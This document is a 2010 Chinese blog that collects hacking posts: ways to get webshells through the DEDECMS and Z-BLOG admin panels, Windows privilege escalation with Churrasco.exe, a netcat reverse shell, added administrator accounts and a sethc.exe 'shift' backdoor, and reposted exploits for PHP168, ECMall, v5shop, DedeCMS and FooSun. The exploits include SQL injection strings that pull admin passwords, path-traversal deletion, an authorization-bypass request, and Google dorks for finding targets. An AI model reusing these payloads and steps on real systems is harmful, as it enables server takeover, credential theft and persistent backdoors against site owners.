GuLang's Blog

DEDECMS后台另类拿Shell方法（图）

chenliangsx@gmail.com(admin) — Thu,29 Jul 2010 23:59:23 +0800

在拿下DEDE后台账号密码的时候，社工或者什么的
DEDE后台能直接上传PHP文件，他是传到uploads目录了，当遇到下面的情况时

那就利用模板上传的功能得Shell，在模板那里新建一个HTM文件，或者上传一个

然后保存，到生成首页文件那里，把上面改成你修改上传的HTM文件，下面改后缀为PHP之后就生成

Z-BLOG后台getshell方法

chenliangsx@gmail.com(admin) — Thu,29 Jul 2010 23:58:30 +0800

Z-BLOG后台利用插件拿WEBSHELL
怎么进后台自己想办法，进入后台
插件管理--TotoroⅡ插件，导出此插件，下载本地利用文本形式打开

base64加密的
PCVAIENPREVQQUdFPTY1MDAxICU+DQo8JQ0KJy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8N
CicvLyDmj5Lku7blupTnlKg6ICAgIFotQmxvZyAxLjcNCicvLyDmj5Lku7bliLbkvZw6ICAg
IA0KJy8vIOWkhyAgICDms6g6ICAgIA0KJy8vIOacgOWQjuS/ruaUue+8miAgIA0KJy8vIOac
gOWQjueJiOacrDogICAgDQonLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KJT4NCjwlIE9w
dGlvbiBFeHBsaWNpdCAlPg0KPCUgT24gRXJyb3IgUmVzdW1lIE5leHQgJT4NCjwlIFJlc3Bv
bnNlLkNoYXJzZXQ9IlVURi04IiAlPg0KPCUgUmVzcG9uc2UuQnVmZmVyPVRydWUgJT4NCjwh
LS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vY19vcHRpb24uYXNwIiAtLT4NCjwhLS0gI2luY2x1
ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19mdW5jdGlvbi5hc3AiIC0tPg0KPCEtLSAjaW5j
bHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX2Z1bmN0aW9uX21kNS5hc3AiIC0tPg0KPCEt
LSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9saWIuYXNwIiAtLT4N
CjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19zeXN0ZW1fYmFzZS5hc3Ai
IC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9ldmVu
dC5hc3AiIC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3Rl
bV9wbHVnaW4uYXNwIiAtLT4NCjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vcGx1Z2luL3Bf
Y29uZmlnLmFzcCIgLS0+DQo8JQ0KDQpDYWxsIFN5c3RlbV9Jbml0aWFsaXplKCkNCg0KJ+aj
gOafpemdnuazlemTvuaOpQ0KQ2FsbCBDaGVja1JlZmVyZW5jZSgiIikNCg0KJ+ajgOafpead
g+mZkA0KSWYgQmxvZ1VzZXIuTGV2ZWw+MSBUaGVuIENhbGwgU2hvd0Vycm9yKDYpIA0KDQpJ
ZiBDaGVja1BsdWdpblN0YXRlKCJUb3Rvcm8iKT1GYWxzZSBUaGVuIENhbGwgU2hvd0Vycm9y
KDQ4KQ0KJT4NCjwlDQoNCkRpbSBhY3QsZGVsaWQNCmFjdD1SZXF1ZXN0LkZvcm0oImFjdCIp
DQpkZWxpZD1SZXF1ZXN0LkZvcm0oImlkIikNCkRpbSBzdHJDb250ZW50DQpEaW0gc3RyWkNf
VE9UT1JPX0JBRFdPUkRfTElTVCxTdHJUTVAsTkVXX0JBRFdPUkQsYm9sVE9UT1JPX0RFTF9E
SVJFQ1RMWQ0Kc3RyQ29udGVudD1Mb2FkRnJvbUZpbGUoQmxvZ1BhdGggJiAiL1BMVUdJTi90
b3Rvcm8vaW5jbHVkZS5hc3AiLCJ1dGYtOCIpDQpDYWxsIExvYWRWYWx1ZUZvclNldHRpbmco
c3RyQ29udGVudCxUcnVlLCJTdHJpbmciLCJUT1RPUk9fQkFEV09SRF9MSVNUIixzdHJaQ19U
T1RPUk9fQkFEV09SRF9MSVNUKQ0KQ2FsbCBMb2FkVmFsdWVGb3JTZXR0aW5nKHN0ckNvbnRl
bnQsVHJ1ZSwiQm9vbGVhbiIsIlRPVE9ST19ERUxfRElSRUNUTFkiLGJvbFRPVE9ST19ERUxf
RElSRUNUTFkpDQpJZiBhY3Q9ImRlbGNtIiB0aGVuDQoNCglEaW0gb2JqQ29tbWVudA0KCVNl
dCBvYmpDb21tZW50PU5ldyBUQ29tbWVudA0KCUlmIG9iakNvbW1lbnQuTG9hZEluZm9ieUlE
KGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hlY2tTdHIob2JqQ29tbWVudC5I
b21lUGFnZSAmICJ8IiAmIG9iakNvbW1lbnQuQ29udGVudCxzdHJaQ19UT1RPUk9fQkFEV09S
RF9MSVNUKQ0KCQlzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNUPXN0clpDX1RPVE9ST19CQURX
T1JEX0xJU1QgJiBTdHJUTVANCgkJTkVXX0JBRFdPUkQ9U3RyVE1QDQoJCVJlc3BvbnNlLldy
aXRlIFRvdG9yb19kZWFsSXQob2JqQ29tbWVudCxib2xUT1RPUk9fREVMX0RJUkVDVExZKQ0K
DQoJRW5kIElmCQkNCgkJDQpFbHNlaWYgYWN0PSJkZWx0YiIgdGhlbg0KDQoJRGltIG9ialRy
YWNrQmFjaw0KCVNldCBvYmpUcmFja0JhY2s9TmV3IFRUcmFja0JhY2sNCglJZiBvYmpUcmFj
a0JhY2suTG9hZEluZm9ieUlEKGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hl
Y2tTdHIob2JqVHJhY2tCYWNrLlVSTCAmICJ8IiAmIG9ialRyYWNrQmFjay5FeGNlcnB0LHN0
clpDX1RPVE9ST19CQURXT1JEX0xJU1QpDQoJCXN0clpDX1RPVE9ST19CQURXT1JEX0xJU1Q9
c3RyWkNfVE9UT1JPX0JBRFdPUkRfTElTVCAmIFN0clRNUA0KCQlORVdfQkFEV09SRD1TdHJU
TVANCgkJUmVzcG9uc2UuV3JpdGUgVG90b3JvX2RlYWxJdChvYmpUcmFja0JhY2ssYm9sVE9U
T1JPX0RFTF9ESVJFQ1RMWSkNCgkNCglFbmQgSWYNCgkNCkVuZCBJZg0KDQpJZiBsZWZ0KHN0
clpDX1RPVE9ST19CQURXT1JEX0xJU1QsMSk9InwiIHRoZW4gc3RyWkNfVE9UT1JPX0JBRFdP
UkRfTElTVD1SaWdodChzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNULCBMZW4oc3RyWkNfVE9U
T1JPX0JBRFdPUkRfTElTVCkgLSAxKQ0KQ2FsbCBTYXZlVmFsdWVGb3JTZXR0aW5nKHN0ckNv
bnRlbnQsVHJ1ZSwiU3RyaW5nIiwiVE9UT1JPX0JBRFdPUkRfTElTVCIsc3RyWkNfVE9UT1JP
X0JBRFdPUkRfTElTVCkNCkNhbGwgU2F2ZVRvRmlsZShCbG9nUGF0aCAmICIvUExVR0lOL3Rv
dG9yby9pbmNsdWRlLmFzcCIsc3RyQ29udGVudCwidXRmLTgiLEZhbHNlKQ0KJ0lmIE5FV19C
QURXT1JEPD4iIiBUaGVuIFJlc3BvbnNlLndyaXRlICIsVG90b3Jv4oWh5paw5aKe5LiL5YiX
6buR6K+N77yaICIgJiBSaWdodChORVdfQkFEV09SRCwgTGVuKE5FV19CQURXT1JEKSAtIDEp
DQoNCiU+DQo8JQ0KRnVuY3Rpb24gVE9UT1JPX2NoZWNrU3RyKHN0clRvQ2hlY2ssQkFEV09S
RF9MSVNUKQ0KCQlEaW0gb2JqUmVnLG9iak1hdGNoZXMsTWF0Y2gNCgkJU2V0IG9ialJlZyA9
IE5ldyBSZWdFeHANCgkJb2JqUmVnLklnbm9yZUNhc2UgPSBUcnVlDQoJCW9ialJlZy5HbG9i
YWwgPSBUcnVlDQoJCW9ialJlZy5QYXR0ZXJuID0gImh0dHA6Ly8oW1x3LV0rXC4pK1tcdy1d
KyINCgkJU2V0IG9iak1hdGNoZXMgPSBvYmpSZWcuRXhlY3V0ZShzdHJUb0NoZWNrKQ0KCQlG
b3IgRWFjaCBNYXRjaCBJbiBvYmpNYXRjaGVzDQoJCQlJZiBUb3Rvcm9fY2hlY2tOZXdCYWRX
b3JkKE1hdGNoLlZhbHVlLEJBRFdPUkRfTElTVCAmIFRPVE9ST19jaGVja1N0cikgdGhlbg0K
CQkJCVRPVE9ST19jaGVja1N0cj1UT1RPUk9fY2hlY2tTdHIgJiAifCIgJiBSaWdodChNYXRj
aC5WYWx1ZSwgTGVuKE1hdGNoLlZhbHVlKSAtIDcpDQoJCQlFbmQgaWYNCgkJTmV4dA0KCQlT
ZXQgb2JqUmVnID0gTm90aGluZw0KCQlTZXQgb2JqTWF0Y2hlcyA9IE5vdGhpbmcNCgkJU2V0
IE1hdGNoID0gTm90aGluZw0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIFRvdG9yb19jaGVj
a05ld0JhZFdvcmQoY29udGVudCxCQURXT1JEX0xJU1QpDQoNCglUb3Rvcm9fY2hlY2tOZXdC
YWRXb3JkPVRydWUNCglEaW0gaSxqDQoJaj0wDQogICAgRGltIHN0ckZpbHRlcg0KICAgIHN0
ckZpbHRlciA9IFNwbGl0KEJBRFdPUkRfTElTVCwgInwiKQ0KCUZvciBpID0gMCBUbyBVQm91
bmQoc3RyRmlsdGVyKQ0KCQlJZiBzdHJGaWx0ZXIoaSk8PiIiIFRoZW4NCgkJCUlmIEluU3Ry
IChMQ2FzZShjb250ZW50KSwgTENhc2Uoc3RyRmlsdGVyKGkpKSkgPiAwIFRoZW4NCgkJCQlU
b3Rvcm9fY2hlY2tOZXdCYWRXb3JkPUZhbHNlDQoJCQkJRXhpdCBGb3INCgkJCUVuZCBJZg0K
CQlFbmQgSWYNCiAgICBOZXh0DQoNCkVuZCBGdW5jdGlvbg0KDQoNCkZ1bmN0aW9uIFRvdG9y
b19kZWFsSXQob2JqVG9EZWFsLGJvbERlbCkNCg0KCURpbSBsb2dJZA0KCWxvZ0lkPW9ialRv
RGVhbC5sb2dfSUQNCg0KCUlmIGJvbERlbCBUaGVuDQoJCUlmIG9ialRvRGVhbC5EZWwoKSBU
aGVuIFRvdG9yb19kZWFsSXQgPSAi5Yig6Zmk5oiQ5YqfIg0KCUVsc2UNCgkJb2JqVG9EZWFs
LmxvZ19JRD0tMS1vYmpUb0RlYWwubG9nX0lEDQoJCUlmIG9ialRvRGVhbC5Qb3N0IFRoZW4g
VG90b3JvX2RlYWxJdCA9ICLlt7LliqDlhaXlrqHmoLgiDQoJRW5kIElmDQoJDQoJQ2FsbCBC
dWlsZEFydGljbGUobG9nSWQsRmFsc2UsRmFsc2UpDQoJQ2FsbCBTZXRCbG9nSGludChOdWxs
LFRydWUsTnVsbCkNCglTZXQgb2JqVG9EZWFsID0gTm90aGluZwkNCgkNCkVuZCBGdW5jdGlv
bg0KJT4=
自己用一句话或小马去base64加密下替换之，修改Totoro/ajaxdel.asp文件名，再进后台删了这个插件重新上传安装下，你的SHELL地址就是PLUGIN/Totoro/xxxx.asp了

利用Shift后门提权入侵服务器方法

chenliangsx@gmail.com(admin) — Thu,29 Jul 2010 23:57:41 +0800

提权时要到的工具如下：cmd.exe Churrasco.exe nc.exe
用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!
代码如下：

　　将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!
　　下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->Current User: NETWORK SERVICE
　　/churrasco/-->Getting Rpcss PID ...
　　/churrasco/-->Found Rpcss PID: 696
　　/churrasco/-->Searching for Rpcss threads ...
　　/churrasco/-->Found Thread: 444
　　/churrasco/-->Thread not impersonating, looking for another thread...
　　/churrasco/-->Found Thread: 700
　　/churrasco/-->Thread not impersonating, looking for another thread...
　　/churrasco/-->Found Thread: 704
　　/churrasco/-->Thread not impersonating, looking for another thread...
　　/churrasco/-->Found Thread: 712
　　/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24
　　/churrasco/-->Getting SYSTEM token from Rpcss Service...
　　/churrasco/-->Found szywjs Token
　　/churrasco/-->Found SYSTEM token 0xf1c
　　/churrasco/-->Running command with SYSTEM Token...
　　直到这里没有出现命令执行成功那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!
　　在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
　　C:\RECYCLER\Churrasco.exe "net localgroup administrators iisuser /add"
　　C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
　　如果说这时没有出现命令执行成功下面我就再告诉你一种方法!
　　如下依次执行：
　　attrib c:\windows\system32\sethc.exe -h -r -s
　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
　　del c:\windows\system32\sethc.exe
　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
　　attrib c:\windows\system32\sethc.exe +h +r +s
　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
　　如果出现拒绝等错误那就没法了!如果说这台服务器先是被别人拿过了做了shift后门那么就是100%成功!本人亲自用这方法成功替换过别人带有密码的SHIFT后门!
　　还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
　　C:\RECYCLER\Churrasco.exe "copy d:\windows\explorer.exe d:\windows\system32\sethc.exe"
　　C:\RECYCLER\Churrasco.exe "copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
　　还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
　　这样就可以利用SHIft后门成功拿下服务器了

PHP168 V6.02 鸡肋漏洞

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:25:52 +0800

无意间发现个 PHP168 V6.02的 BUG
跟之前那个 job 下载任意文件性质差不多
只不过这次是把任意文件再拷贝为一份jpg出来！附加一个爆路

漏洞文件出现在 “do/cutimg.php”
if($action=="cutimg"){
$NewPic=str_replace($webdb[www_url],"",$uploadfile);
$NewPic=PHP168_PATH.$NewPic;
include(PHP168_PATH."inc/waterimage.php");
if($nextpic
虽然无法直接拿shell，但是对渗透又多了一条路可走~~
利用方法

华速网游交易平台oday

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:24:41 +0800

程序：华速网游交易平台
漏洞说明:上传，暴库
google关键字: inurl:list_buy.asp?class_1

EXP测试：
（复制代码保存为html文件）

上传完毕，右键查看源码，上传的马就在根目录之下。
如果上传不了的话，把的value的值修改为“/upfile/a.asp;aaa”，图片目录应该是可写的。

google关键字: inurl:list_buy.asp?class_1

如果上传失效的话，可以直接访问inc/config.asp文件，暴出数据库地址，进后台拿shell。

ECMall 2.2 app/groupbuy.app.php 延迟注射漏洞

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:23:46 +0800

代码分析
ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[''id'']) ? 0 : $_GET[''id'']; //id未过滤if (!$id){$this->show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this->_groupbuy_mod->get(array(‘conditions’ => ‘group_id=’ . $id . ‘ AND gb.state<>’ . GROUP_PENDING, //好的，进去了！！‘join’ => ‘belong_store’,‘fields’ => ‘gb.*,s.owner_name’));if (empty($group)) //很多时候根本没有团购信息，所以是延迟注射了{$this->show_warning(‘no_such_groupbuy’);return;}

测试方法
【sitedir.com.cn】
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)–

v5shop 网上商城系统oday

chenliangsx@gmail.com(admin) — Sun,18 Jul 2010 12:51:45 +0800

漏洞文件：cart.aspx

关键字：services.aspxid=
inurl:scoreindex.aspx

默认后台地址：weblogin/Login.aspx

以下是测试EXP：

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 order by [Name],[Pass]) T order by [Name] desc,[Pass] desc)>0 --

weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.

非安全中国安全建议：
目前官方没有发布相关补丁或升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
www.v5shop.com.cn  （官网网站）
临时修复方法，把cart.aspx临时改名
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1231.html

织梦(Dedecms)V5.6远程文件删除漏洞

chenliangsx@gmail.com(admin) — Sun,18 Jul 2010 12:50:49 +0800

影响版本:DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
漏洞文件：edit_face.php

else if($dopost==''delold'')  //45行
{
        if(empty($oldface))
        {
                ShowMsg("没有可删除的头像！", "-1");
                exit();
        }
        $userdir = $cfg_user_dir.''/''.$cfg_ml->M_ID;
        if(!ereg(''^''.$userdir, $oldface))
        {
                $oldface = '''';
        }
        if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
        {
                @unlink($cfg_basedir.$oldface);
        }

只判断oldface 前面是否在目录下，没包括过滤 ../
但有验证  \.(jpg|gif|png)$  ，所以只能删除  jpg , gif ,png 类型的文件
测试方法:
http://sitedir.com.cn/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
厂商补丁：
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dedecms.com/

文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1230.html

风讯（FooSun）GetPassword.asp任意修改密码漏洞

chenliangsx@gmail.com(admin) — Sun,18 Jul 2010 12:50:13 +0800

影响版本:
FooSun > 5.0漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\ GetPassword.asp中：
ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword =''"& NoSqlHack(p_pass_new) &"'' where UserName = ''"& NoSqlHack(StrUserName) &"'' and Email = ''"& NoSqlHack(Replace(Request.Form("Email"),"''''",""))&"''") //第220行
用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。<*参考
Bug.Center.Team
*>
测试方法:

厂商补丁：
FooSun
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.foosun.net/

文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1229.html

风讯网站管理系统页面越权漏洞

chenliangsx@gmail.com(admin) — Sun,18 Jul 2010 12:49:37 +0800

影响版本:
FooSun > 5.0

程序介绍:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

漏洞分析:

在文件\User\ Corp_card_Unpass.asp中：

If Request.Form("Action") = "Save" then //第14行

Dim DelID,Str_Tmp,Str_Tmp1

DelID = request.Form("CorpCardID")

if DelID = "" then

strShowErr = "

你必须选择一项再删除

"

Call ReturnError(strShowErr,"")

End if

User_Conn.execute("Delete From FS_ME_CorpCard where CorpCardID in ("&FormatIntArr(DelID)&")")

程序在执行删除记录时，没有验证用户的合法性导致可以任意删除他人记录。

漏洞利用:

POST /User/Corp_card_Unpass.asp HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)

Host: aaaa.1122.org

Content-Length: 44

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: FoosunSUBCookie=FoosunSUBMF=1&FoosunSUBNS=1&FoosunSUBDS=1&FoosunSUBME=1&FoosunSUBCS=1&FoosunSUBSS=1&FoosunSUBVS=1&FoosunSUBAS=1&FoosunSUBWS=1&FoosunSUBFL=1; FoosunDSCookies=FoosunDSLinkType=0&FoosunDSIndexTemplet=%2FTemplets%2Fdown%2Findex%2Ehtm&FoosunDSIndexPage=index%2Ehtml&FoosunDSDownDir=down&FoosunDSDomain=&FoosunDSOverDueMode=1&FoosunDSIPList=&FoosunDSIPType=1&FoosunDSLock=1; FoosunNSCookies=FoosunNSSiteName=%D0%C2%CE%C5%CF%B5%CD%B3&FoosunNSLinkType=0&FoosunNSIndexTemplet=%2FTemplets%2FNewsClass%2Findex%2Ehtm&FoosunNSIndexPage=index%2Ehtml&FoosunNSNewsDir=%2F&FoosunNSDomain=; FoosunMFCookies=FoosunMFCopyright=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE%B0%E6%C8%A8%CB%F9%D3%D0%A3%A1&FoosunMFIndexFileName=index%2Ehtml&FoosunMFIndexTemplet=%2FTemplets%2FIndex%2Ehtm&FoosunMFWriteType=0&FoosunMFPicClassid=9&FoosunMFMarkType=1&FoosunMFEmail=service%40foosun%2Ecn&FoosunMFVersion=4%2E0+Sp5&FoosunMFsiteName=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE&FoosunMFDomain=localhost; FoosunSearchCookie=Cookie%5FSite%5FName=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE&Cookie%5FeMail=service%40foosun%2Ecn&Cookie%5FCopyright=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE%B0%E6%C8%A8%CB%F9%D3%D0%A3%A1&Cookie%5FDomain=localhost; ASPSESSIONIDASRRTCAB=BAKHNIGDKFJEDAMHFGBFJEPB; FoosunUserCookies=UserLogin%5FStyle%5FNum=2; FoosunUserlCookies=FS%5FUser%5FLogin%5FNumber=0; ASPSESSIONIDCQRQSDBB=MKKBHBIDCLJIMJGOLIMJPDAC

Action=Save&CorpCardID=1&Submit=%CC%E1%BD%BB

解决方案:
厂商补丁：
FooSun
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.foosun.net/

信息来源:
<*来源: Bug.Center.Team
链接: http://wavdb.com/vuln/1674
*>

文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1225.html